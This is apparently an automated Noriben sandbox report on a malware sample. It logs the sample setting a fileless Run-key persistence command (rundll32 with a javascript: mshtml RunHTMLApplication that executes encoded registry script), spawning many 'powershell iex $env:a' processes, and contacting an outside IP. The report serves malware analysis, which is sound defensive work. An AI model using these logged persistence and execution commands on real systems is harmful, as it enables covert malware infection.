-=] Sandbox Analysis Report generated by Noriben v1.8.3
-=] Developed by Brian Baskin: brian @@ thebaskins.com  @bbaskin
-=] The latest release can be found at https://github.com/Rurik/Noriben

-=] Execution time: 613.48 seconds
-=] Processing time: 171.96 seconds
-=] Analysis time: 168.90 seconds

Processes Created:
==================
[CreateProcess] Explorer.EXE:6487 > "%UserProfile%\Downloads\set1_other\VirusShare_c042511df4ce1f0305fb0cb1b84780a9\c831f7db89b27c0b0fdbc47e106eebbd041a413589e1b4d7ac85b769382e6285.exe "	[Child PID: 2960]
[CreateProcess] c831f7db89b27c0b0fdbc47e106eebbd041a413589e1b4d7ac85b769382e6285.exe:2960 > "rundll32.exe javascript:\..\mshtml,RunHTMLApplication ;document.write(\74script language=jscript.encode>+(new%20ActiveXObject(WScript.Shell)).RegRead(HKCU\\software\\microsoft\\windows\\currentversion\\run\\)+\74/script>)"	[Child PID: 5168]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 3352]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 3820]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 5264]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 1084]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 9084]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8896]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 2428]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 7212]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 5848]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 7360]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 9156]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8904]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 7244]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 6056]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 7792]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 5804]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8628]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 3592]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 2396]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 2284]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 6104]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8136]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 4200]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 6340]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8160]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 3872]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 6056]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 3188]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 1248]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 5808]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 5768]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 2900]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 6964]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 6116]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 6484]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 7680]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8076]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 6384]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 7328]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8544]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8444]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 1248]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 2076]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8672]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 6556]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 7864]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 5364]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 3040]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 1680]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 6028]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 4740]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 5100]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 3304]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 7272]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 7072]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 1632]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 116]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8216]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 5808]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8268]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 6244]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 2752]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 9016]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8472]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 6464]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8560]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 6484]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 9200]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 6380]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 9140]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8708]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8984]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 3104]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 8696]
[CreateProcess] rundll32.exe:5168 > "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe iex $env:a"	[Child PID: 7916]

File Activity:
==================
[WriteFile] c831f7db89b27c0b0fdbc47e106eebbd041a413589e1b4d7ac85b769382e6285.exe:2960 > %UserProfile%\ntuser.dat.LOG2	[File no longer exists]

Registry Activity:
==================
[RegSetValue] c831f7db89b27c0b0fdbc47e106eebbd041a413589e1b4d7ac85b769382e6285.exe:2960 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\  =  rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")
[RegSetValue] rundll32.exe:5168 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass  =  1

Network Traffic:
==================
[TCP] c831f7db89b27c0b0fdbc47e106eebbd041a413589e1b4d7ac85b769382e6285.exe:2960 > 178.89.159.34:80

Unique Hosts:
==================
178.89.159.34
